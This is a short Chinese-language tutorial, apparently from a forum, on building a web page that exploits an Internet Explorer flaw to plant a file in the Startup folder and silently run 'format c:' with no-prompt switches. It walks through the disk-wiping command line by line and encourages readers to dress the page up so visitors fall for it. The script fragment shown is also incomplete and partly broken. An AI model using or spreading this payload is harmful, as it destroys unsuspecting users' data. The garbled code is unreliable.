這個是一個關于HTML代碼攻擊的，雖然短點大家看看怎么樣，能實現的哦。 現在的Windows操作系統實在是很方便，連格式化都是只用鼠標點點就可以了，不用象以前那樣要輸入命令來完成格盤。 我們要做一個格本地磁盤網頁并不是很難，會HTML代碼的朋友一定是沒有什么問題的，這個其實就是利用一下IE的漏洞來實現我們的目的。 下面我們看一下下面的代碼我們就會發現其中的奧妙所在了。scr.reset() scr.path="c:\windows\start menu\programs\啟動\文件名 scr.doc="" wsh.run('start.exe /m format c:/q/autotest/u')
對于HTML代碼了解的朋友們一定看出來了吧，這段代碼的利害之處就在于最后一句，格你的磁盤沒商量。 下面我們來看看這段代碼的，具體的分析一下的他的工作原理是怎么樣的。 首先，我們來看看這一句scr.path="c:\windows\start menu\programs\啟動\文件名
這句，就是當看到這個網頁的時候，它會寫入到用戶的機器的啟動目錄下，并以一個文件名的文件形式出現wsh.run('start.exe /m format c:/q/autotest/u')
這句就是我們這里所要講的核心東西了，對于format 這個命令大家不會陌生的吧，只要知道這個命令的朋友，一定會知道這句命令的意思的，我就在這里不在多說什么了。 在這里我把他的一些參數，簡要的說說，大家會更加明白的。 在進行格盤的時候系統會與你進行對話，是否進行的，大家看到這個參數了嗎/autotest他會強制性的對你的硬盤進行格式化，而不再進行詢問；/q/u這兩個參數為系統不需要檢查立執行。在上一句中的start.exe與/m選項配合，哈哈，相信在執行時以最小化的狀態進行，誰都會頭痛的。 在這段代碼里，核心語句wsh.run('start.exe /m format c:/q/autotest/u')
我們只要對這段代碼進行改動相信會出現更多不同的變化。在應用的時候把自己HTML代碼做的漂亮一些，相信一定會有很多的人會上當，不小心中了你的圈套。